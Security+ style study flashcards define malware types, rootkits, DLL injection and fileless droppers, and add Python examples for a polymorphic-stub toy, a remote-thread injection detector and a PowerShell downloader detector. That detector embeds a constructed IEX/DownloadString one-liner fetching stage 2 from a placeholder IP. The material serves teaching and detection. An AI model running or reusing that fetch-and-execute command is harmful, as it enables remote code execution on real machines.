2.4 Flashcards
Brute force attacks (physical): attacks that rely on raw force rather than stealth, for example
forcible entry
tampering with security devices
confronting security personnel
ramming barriers with vehicles
Viruses and types
Malicious code that runs on a machine without the user's knowledge; unlike a worm, a virus needs a host file or program and some user action to spread. Types:
boot sector
macro
program
multipartite
encrypted
polymorphic
metamorphic
stealth
armored
hoax
boot sector virus
Stored in the first sector of the hard drive (the boot sector / master boot record) and loaded into memory when the computer boots, before the OS and any anti-virus software have started
Macro virus
Written in a document's macro language (for example VBA in Office files), so the virus is embedded inside another document and runs when that document is opened
Program virus
Infects executable program files and runs whenever the infected program is launched
multipartite virus
Combination of a boot sector virus and a program virus: it can infect both the boot sector and executable files, so cleaning only one of them leaves the other to reinfect
encrypted virus
Encrypts its malicious body so signature-based anti-virus does not see the plaintext code; a small unencrypted decryption routine (the stub) decrypts the body at run time, and because that stub is identical in every copy, it is what anti-virus ends up signaturing
Polymorphic virus
Advanced form of encrypted virus: it changes its code each time it runs by altering the decryption module (stub) and key for every new copy, so no fixed byte pattern exists to write a signature for
Metamorphic virus
More advanced than polymorphic: it rewrites its entire body, not just the decryptor, before it attempts to infect a given file, so successive copies share no code
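An added example to make the encrypted/polymorphic distinction concrete (illustration code written for these notes, not from the original flashcards or any real sample): a made-up "virus body" is stored encrypted behind a tiny decryptor stub. The sample layout (3-byte method tag, 1-byte key, encrypted body), the XOR/ADD transforms and the payload text are all invented for the demo. The encrypted virus reuses the same stub and key, so a scanner can still signature the stub; the polymorphic version re-randomizes both per copy, and only a scanner that emulates the stub and looks at the decrypted body keeps matching. A metamorphic virus would go further and rewrite the body itself, which this demo does not model.

```python
import random

# Constructed stand-in for a virus body; in a real sample this is machine code.
PAYLOAD = b"INFECT: append self to every .exe in the working directory"
# The byte pattern an anti-virus vendor would extract from the plaintext body.
BODY_SIGNATURE = b"INFECT: append"

# Two functionally equivalent (encrypt, decrypt) transform pairs. A polymorphic
# engine picks one at random for each new copy so the decryptor stub varies.
TRANSFORMS = {
    b"XOR": (lambda data, k: bytes(x ^ k for x in data),
             lambda data, k: bytes(x ^ k for x in data)),
    b"ADD": (lambda data, k: bytes((x + k) & 0xFF for x in data),
             lambda data, k: bytes((x - k) & 0xFF for x in data)),
}

# Hypothetical sample layout: 3-byte method tag, 1-byte key, then the encrypted
# body. The first 4 bytes play the role of the decryptor stub.
STUB_LEN = 4
ENCRYPTED_STUB = b"XOR" + bytes([0x5A])   # the fixed stub an encrypted virus reuses


def make_copy(rng, polymorphic):
    """Emit one infected copy.

    encrypted virus : same transform and key every time -> identical stub bytes
    polymorphic     : random transform and key per copy -> stub bytes vary too
    """
    if polymorphic:
        method = rng.choice(sorted(TRANSFORMS))
        key = rng.randrange(1, 256)        # key 0 would leave the body in plaintext
    else:
        method, key = b"XOR", 0x5A
    encrypt, _ = TRANSFORMS[method]
    return method + bytes([key]) + encrypt(PAYLOAD, key)


def run_stub(sample):
    """'Execute' the stub: read its method and key, decrypt the body in memory."""
    method, key, body = sample[:3], sample[3], sample[STUB_LEN:]
    _, decrypt = TRANSFORMS[method]
    return decrypt(body, key)


def static_scan(sample, signature):
    """What a plain signature scanner sees: the bytes as stored on disk."""
    return signature in sample


def emulated_scan(sample, signature=BODY_SIGNATURE):
    """What a scanner with emulation sees: the body after the stub has run."""
    return signature in run_stub(sample)


def generations(seed, n, polymorphic):
    """Produce n copies from a seeded RNG so the results are reproducible."""
    rng = random.Random(seed)
    return [make_copy(rng, polymorphic) for _ in range(n)]
```

Scanning `generations(7, 20, True)` shows `static_scan` missing the body signature in every copy and the stub bytes differing between copies, while `emulated_scan` still catches all of them; the non-polymorphic copies are byte-identical and all start with `ENCRYPTED_STUB`.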
stealth virus
Techniques used to keep the infection from being noticed by anti-virus software, for example intercepting file reads so the scanner is shown the original, clean contents of an infected file
armored virus
Has a layer of protection (obfuscation, anti-debugging tricks) to confuse a program or a person trying to analyze it
hoax
A form of technical social engineering that tries to scare end users into taking some undesirable action on their own system, for example a pop-up saying you have a virus and giving "removal" steps that are themselves the harmful action
worm
Malicious software that, unlike a virus, requires no user action: a worm replicates itself across the network on its own by exploiting vulnerabilities in the OS or applications, typically missing security patches
trojan
Malicious code disguised as harmless or desirable software (a Tetris game, for example) so the user installs it themselves
RAT Remote Access Trojan
A trojan widely used by modern attackers because it gives the attacker remote control of the victim machine
Ransomware
Malicious software that blocks access to a system or its data, usually by encrypting the data, until a ransom is paid
Zombies
Name for a compromised system that is part of a botnet; it performs tasks sent as remote commands from the attacker, without the owner's knowledge
Attackers often use only 20-25% of a zombie's processing power so the infection does not draw the owner's attention
Botnet
A network composed of zombies controlled by malicious actors
Mostly used for DDoS attacks
Command and Control (C2) Node
The computer responsible for managing and coordinating the activities of the other nodes (the zombies) in a botnet
Rootkit
Digs deep into the OS to embed itself there and gain administrative privileges over the system without being detected
Can open and close ports, delete programs, install programs, and hide its own files and processes
Ring 3
Outermost ring, user mode, where ordinary user-level permissions apply
Ring 0
Innermost ring and highest permission level, aka kernel mode
kernel mode
Lets the system control access to hardware and low-level resources such as device drivers, the sound card, the monitor, etc.; a rootkit running here controls what ring 3 programs (including anti-virus) get to see
DLL Injection
Technique used to run arbitrary code within the address space of another process by forcing it to load a dynamic link library, typically by writing the DLL path into the target process and starting a remote thread there that calls LoadLibrary
DLL
Dynamic Link Library
A collection of code and data that multiple programs can use simultaneously, allowing code reuse and modularization in software development
Device drivers, for example, are commonly packaged as DLLs
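Added detection-side example (not from the original flashcards): because DLL injection needs a remote thread in the victim process that starts at LoadLibrary, logging thread creation across processes is a common way to spot it. The records below are constructed, modelled on the fields Sysmon writes for Event ID 8 (CreateRemoteThread); every path, and the `ALLOWED_SOURCES` allowlist entry, is hypothetical.

```python
# Constructed records, modelled on the fields Sysmon logs for Event ID 8
# (CreateRemoteThread): which process created a thread in which other process,
# and where that thread starts executing. All values are made up for the demo.
EVENTS = [
    {"SourceImage": r"C:\Users\bob\Downloads\update.exe",
     "TargetImage": r"C:\Windows\explorer.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL",
     "StartFunction": "LoadLibraryA"},            # textbook DLL injection
    {"SourceImage": r"C:\Users\bob\AppData\Local\Temp\svc.exe",
     "TargetImage": r"C:\Program Files\Browser\browser.exe",
     "StartModule": "",
     "StartFunction": ""},                         # thread starts in memory no module backs
    {"SourceImage": r"C:\Program Files\Vendor\agent.exe",   # hypothetical allowlisted EDR agent
     "TargetImage": r"C:\Windows\System32\notepad.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL",
     "StartFunction": "LoadLibraryW"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe",
     "StartModule": r"C:\Windows\System32\ntdll.dll",
     "StartFunction": "RtlUserThreadStart"},      # ordinary thread start, nothing to flag
]

# Hypothetical allowlist: legitimate tools (EDR agents, debuggers) inject DLLs too.
ALLOWED_SOURCES = {r"c:\program files\vendor\agent.exe"}

# LoadLibrary as the remote thread's start routine is the fingerprint of DLL
# injection via CreateRemoteThread: the injector passes the DLL path as the
# thread parameter and lets the loader do the rest.
LOADLIBRARY = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

# Injectors usually run from somewhere a normal user can write to.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")


def classify(event):
    """Return (label, reason) for a suspicious remote-thread event, else None."""
    src = event["SourceImage"].lower()
    if src in ALLOWED_SOURCES:
        return None
    if event["StartFunction"] in LOADLIBRARY:
        label = "dll-injection"
        reason = f"remote thread in {event['TargetImage']} starts at {event['StartFunction']}"
    elif not event["StartModule"]:
        label = "shellcode-injection"
        reason = f"remote thread in {event['TargetImage']} starts in memory backed by no module"
    else:
        return None
    if any(marker in src for marker in USER_WRITABLE):
        reason += "; source runs from a user-writable path"
    return label, reason


def findings(events):
    """Run the rule over a batch: [(index, label, reason), ...] for every hit."""
    out = []
    for i, ev in enumerate(events):
        hit = classify(ev)
        if hit:
            out.append((i, hit[0], hit[1]))
    return out
```

The second branch (`StartModule` empty) is there because the same CreateRemoteThread primitive is used to run raw shellcode rather than a DLL; the allowlist exists because security products and debuggers legitimately do the same thing, and without it the rule drowns in their noise.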
Shim
A piece of code placed between two components that intercepts the calls between them and can redirect them; used non-maliciously (application compatibility fixes) or maliciously (hijacking the intercepted calls). Defense: code signing, so that only trusted, signed code gets loaded
Backdoor
Originally placed in computer programs by the programmers themselves to bypass normal authentication (for maintenance or testing); a backdoor left in production, or planted by malware, gives an attacker the same bypass
Easter Egg
A hidden feature or novelty within a program, usually an inside joke. These tend to carry more vulnerabilities because they are not tested as rigorously and are often added right before the program is completed
logic bombs
Malicious code inserted into a program that executes only when certain conditions are met (a date, or a user account disappearing from payroll); a disgruntled or fired employee is the classic planter
keylogger
software or hardware that records keystrokes
software keylogger
Usually delivered through a social engineering attack such as phishing
hardware keylogger
A physical device plugged in between the keyboard and the computer; anti-virus software cannot detect it because the OS only sees a normal keyboard
spyware
malicious software that is designed to gather and send info about a user or org without their knowledge
bloatware
any pre-installed software that you did not specifically request. It wastes storage space, slows performance etc
malware exploitation technique
specific method by which malware code penetrates and infects a targeted system
fileless malware
Creates a process in system memory without relying on the local file system of the infected host
Anti-virus software usually scans the file system, but fileless malware lives in RAM, making it hard to detect; it persists through things like registry run keys, WMI subscriptions or scheduled tasks that relaunch it in memory rather than through a file on disk, evades signature-based detection, and bypasses many traditional security measures
Stage 1: dropper or downloader
A piece of malware usually created as lightweight shell code that can be executed on a given system
Its goal is to establish a foothold in the system; it is the initial infection and does not itself perform a significant amount of malicious actions
dropper
A specific type of malware designed to initiate or run other malware forms carried within its own payload on the infected host
downloader
Retrieves additional tools after the initial infection established by a dropper
shell code
A broader term for the lightweight code meant to execute an exploit on a given target
stage 2 downloader
Downloads and installs a remote access trojan (RAT) to conduct command and control on the victim system
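Added example (not from the original notes) of what a fileless stage-1 downloader typically looks like and how to catch it when there is no file to scan: a PowerShell one-liner, passed base64-encoded via `-EncodedCommand`, that fetches stage 2 from a URL and runs it with `IEX` in memory. The command lines, the script text and the 203.0.113.10 address are constructed for the demo. Only `powershell.exe` ever exists on disk, so detection has to look at the process command line and decode the encoded argument.

```python
import base64
import re


def build_encoded_command(script):
    """Encode a script the way 'powershell -EncodedCommand' expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-1 script: fetch stage 2 from a URL and run it in memory.
# 203.0.113.10 is a documentation address; nothing here is a real capture.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s2.ps1')"

# Constructed process command lines as a process-creation log would record them.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -Command Get-Process",                      # benign admin use
    "powershell.exe -NoP -W Hidden -Enc " + build_encoded_command(STAGE1),  # stage 1 downloader
    "cmd.exe /c dir",
]

# -EncodedCommand and its short forms, followed by the base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Indicators of download-and-execute behaviour, checked against the command line
# and, when one is present, the decoded script.
INDICATORS = [
    (re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE), "in-memory execution"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.IGNORECASE), "remote fetch"),
    (re.compile(r"-W(?:indowStyle)?\s+Hidden", re.IGNORECASE), "hidden window"),
]


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None   # not valid base64/UTF-16LE: leave it for a human


def analyze(cmdline):
    """List the indicator names found in the visible command line plus the decoded script."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = [name for pattern, name in INDICATORS if pattern.search(text)]
    if decoded is not None:
        hits.insert(0, "encoded command")
    return hits
```

`analyze` on the benign lines returns an empty list; on the stage-1 line it reports the encoded command plus all three behaviours, none of which are visible without decoding the argument first.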